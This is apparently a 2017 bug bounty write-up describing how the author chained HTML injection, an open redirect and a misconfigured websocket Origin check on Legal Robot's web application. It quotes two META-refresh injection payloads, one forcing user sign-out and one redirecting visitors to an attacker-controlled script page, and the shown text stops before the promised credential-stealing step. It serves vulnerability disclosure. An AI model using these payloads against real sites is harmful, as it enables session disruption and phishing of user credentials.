Chain the vulnerabilities and take your report impact on the moon (CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing)

4 min readAug 12, 2017

It was weekend and time for some Research. So i started reading some public disclosures from https://hackerone.com/hacktivity.
after reading some good blogs i have decided to implement them. so i quickly i had selected my target.

So i had noticed that legalrobot (Legal Robot)has a quick response and it is resolving the vulnerabilities quicky. so i have selected Legal Robot as my target and started looking into the assets and its scope.

after understanding the scope i had started looking into the application.and i had noticed that is not sanitizing the spacial characters from some parameters. so i started injecting some html tags and was able to inject html tags.

So yeah i had found HTML injection. BUG #1.

So i started finding xss over there that if i am able to execute xss or not.

so it had injected the payload but i had found that web application is using CSP. and alert was not popping up. :(((((((( sad part. :(

but if you are a hacker then you will never get satisfied until and unless you will exploit it

so i had started digging more and i put my second use case payload. which was

“/><META HTTP-EQUIV=”refresh” CONTENT=”1;url=https://app.legalrobot.com/sign-out">

So yes i with the help of this payload whenever the user visits the roadmap page it will automatically get log out from his-her account.

and i had found this tricky. so next i had tried to redirect on my website. and executive malicious script. so i used this payload

“/><META HTTP-EQUIV=”refresh” CONTENT=”1;url=http://www.mysite.com/malicious_script.html">

and what it was resulting to open redirectBUG #2

and also executing my malicious scripts.

some how i was able to perform malicious tasks.

Quickly i made a PoC of it and reported. and i got quick reply from team, which was this.

though the bug was triaged but the team member has mentioned that attacker has to do a little social engineering. i was like yeah but was not satisfied when i read “SOCIAL ENGINEERING” but the team member had gave me a hint by mentioning “UNKNOWN EXPLOIT”. well i that was enough hint for me.

again i started digging into the application. and while i was digging into the web application had noticed that the web application is using the websockets.

okay now i started checking headers of every pages and i found a Origin header. which was misconfigured. #BUG 3

so i started connecting to third party web sockets to this application and i was able to connect to the application by using the third party web sockets.